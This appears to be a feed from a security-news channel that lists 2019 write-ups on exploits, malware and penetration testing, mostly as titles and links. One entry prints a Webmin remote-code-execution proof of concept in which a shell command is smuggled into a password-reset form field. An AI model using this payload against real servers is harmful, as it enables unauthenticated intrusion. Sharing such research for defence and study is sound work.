How i was able to hack into databases of my university
https://medium.com/@fouadsarmi/how-i-was-able-to-hack-into-databases-of-my-university-669d6442a943
Medium
How i was able to hack into databases of my university
Hello guys, after graduating from high school I was interested in hacking and penetration testing, so my full mind was surrounded…
10 years of virtual dynamite: A high-level retrospective of ATM malware
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html
Cisco Talos Blog
10 years of virtual dynamite: A high-level retrospective of ATM malware
ATM malware has evolved to include a number of different families and different actors behind them, ranging from criminal groups to actors affiliated with nation states.
Сookie-based XSS exploitation | $2300 Bug Bounty story
https://medium.com/@iSecMax/%D1%81ookie-based-xss-exploitation-2300-bug-bounty-story-9bc532ffa564
Medium
Сookie-based XSS exploitation | $2300 Bug Bounty story
For quite a long time I have been hunting for vulnerabilities on the HackerOne platform, allocating a certain amount of time outside the…
Multiple vulnerabilities in Oracle Business Intelligence, admin session bypass trick
https://github.com/vah13/Oracle-BI-bugs#cve-2019-2768
GitHub
GitHub - vah13/Oracle-BI-bugs
Payload to create a new user with Admin role exploiting Jenkins Metaprogramming RCE
https://gist.github.com/akhil-reni/e2116cc243af096ca3416168f49b3298
Gist
Jenkins Metaprogramming RCE Create new user
Forwarded from امنیت اطلاعات
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
Orange
Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN
This is 🍊 speaking
Forwarded from امنیت اطلاعات
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
RouterOS Post Exploitation
A tool to help enable and maintain root shell access in RouterOS 3.x through the current release.
https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
@sec_nerd_en
Medium
RouterOS Post Exploitation
Shared Objects, RC Scripts, and a Symlink